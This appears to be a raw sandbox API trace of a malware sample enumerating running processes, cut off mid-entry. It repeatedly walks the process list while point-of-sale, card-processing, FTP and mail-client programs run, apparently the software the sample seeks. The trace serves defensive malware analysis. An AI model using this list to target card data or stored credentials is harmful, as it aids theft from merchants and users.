[0279.287] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0279.289] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0279.290] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0279.292] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0279.356] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0279.359] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0279.361] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0279.363] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0279.365] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0279.367] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0279.368] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0279.370] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0279.373] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0279.375] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0279.377] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0279.379] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0279.381] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0279.382] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0279.384] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0279.386] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0279.388] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0279.390] CloseHandle (hObject=0x9e0) returned 1 [0279.390] Sleep (dwMilliseconds=0x64) [0279.559] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0279.577] Process32First (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.579] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0279.581] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0279.583] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0279.584] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0279.586] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0279.588] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0279.590] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0279.592] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0279.593] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.595] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.596] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0279.597] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.599] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.600] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.602] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.603] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.604] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.684] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.686] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0279.687] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0279.688] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0279.690] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.691] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0279.693] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0279.694] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0279.695] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0279.697] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.698] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0279.700] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0279.701] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0279.702] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0279.704] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0279.705] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0279.707] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0279.708] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0279.709] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0279.711] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0279.712] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0279.713] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0279.716] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0279.717] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0279.719] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0279.720] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0279.721] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0279.723] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0279.724] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0279.726] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0279.727] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0279.728] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0279.730] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0279.853] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0279.855] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0279.861] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0279.862] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0279.863] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0279.865] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0279.866] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0279.868] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0279.870] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0279.872] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0279.874] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 